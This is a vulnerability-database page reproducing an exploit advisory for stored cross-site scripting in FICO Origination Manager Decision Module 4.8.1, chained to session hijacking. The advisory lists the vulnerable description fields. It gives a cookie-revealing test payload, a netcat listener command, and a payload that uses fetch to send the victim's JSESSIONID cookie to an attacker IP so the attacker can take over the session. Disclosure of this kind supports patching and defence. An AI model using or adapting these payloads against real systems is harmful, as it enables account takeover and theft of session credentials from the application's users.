Vulners
Lucene search
FICO Origination Manager Decision Module 4.8.1 XSS / Session Hijacking
šļøĀ 08 May 2023Ā 00:00:00Reported byĀ Matei JosephsTypeĀ 
Ā packetstormšĀ packetstormsecurity.comšĀ 317Ā Views
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
 | FICO Origination Manager Decision Module 4.8.1 XSS / Session Hijacking Vulnerabilities | 9 May 202300:00 | ā | zdt |
 | CVE-2023-30056 | 10 May 202300:38 | ā | circl |
| CVE-2023-30057 | 10 May 202300:38 | ā | circl |
 | FICO Origination Manager č·Øē«čę¬ę¼ę“ | 9 May 202300:00 | ā | cnnvd |
| FICO Origination Manager ęęé®é¢ę¼ę“ | 9 May 202300:00 | ā | cnnvd |
 | CVE-2023-30056 | 9 May 202300:00 | ā | cve |
| CVE-2023-30057 | 9 May 202300:00 | ā | cve |
 | CVE-2023-30056 | 9 May 202300:00 | ā | cvelist |
| CVE-2023-30057 | 9 May 202300:00 | ā | cvelist |
 | EUVD-2023-34489 | 3 Oct 202520:07 | ā | euvd |
10
`# Exploit Title: Stored-XSS in FICO Origination Manager Decision Module 4.8.1 Leads to Session Hijacking
# Date: 2023-05-07
# Exploit Author: Matei Josephs
# Vendor Homepage: https://www.fico.com/
# Version: FICO Origination Manager Decision Module 4.8.1
# CVE : CVE-2023-30056, CVE-2023-30057
Introduction
=================
Multiple stored cross-site scripting (XSS) vulnerabilities in FICO Origination Manager Decision Module 4.8.1 allow to execute code in the context of the victim's browser using a crafted payload. Additionally, an attacker with initial access to the application, can get the JSESSIONID cookie of another user and take over their session. These two findings can be chained together.
Proof of Concept
=================
All description fields when adding Categories and Products, Product Strategies, Decision Flows, Data Object References, Data Methods, Data Method Sequences, Rulesets, Decision Tables, Decision Trees, Score Models, Scenarios, or Internal Services are vulnerable to a stored XSS using the following payload:
<img/src/onerror=prompt(document.cookie)>
An attacker could implement a cookie stealer as follows:
On the attacker's machine:
nc -lvnp <PORT>
In one of the vulnerable description fields:
<img/src/onerror=fetch('http://<ATTACKER-IP>:<PORT>/'+document.cookie)>
When a victim would visit the page where the payload was injected, the attacker would receive their JSESSIONID cookie. The attacker could then use the JSESSIONID cookie to log into the Origination Manager Decision Module as the victim.
`
Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 May 2023 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.00486